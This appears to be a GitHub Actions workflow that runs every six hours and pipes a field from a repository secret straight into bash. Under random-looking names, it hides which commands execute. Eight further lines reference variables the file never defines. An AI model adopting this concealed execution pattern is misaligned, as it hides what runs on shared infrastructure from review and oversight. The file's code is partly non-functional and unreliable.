name: txyunmm

on:
  workflow_dispatch:
  schedule:
    - cron: '31 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: txyunmm
        env:
          hug866: ${{ secrets.hug866 }}
        run: |
          echo $hug866 | jq -r .y80226 | /bin/bash
          echo $eiur895 | jq -r .al81 | /bin/bash
          echo $uake00575 | jq -r .lz6 | /bin/bash
          echo $fmcc0163 | jq -r .zi91185 | /bin/bash
          echo $qdv77 | jq -r .pip7 | /bin/bash
          echo $qiyr25 | jq -r .qcyz96 | /bin/bash
          echo $j334 | jq -r .jjfn9 | /bin/bash
          echo $b85 | jq -r .nu43 | /bin/bash
          echo $mvg14 | jq -r .a44 | /bin/bash

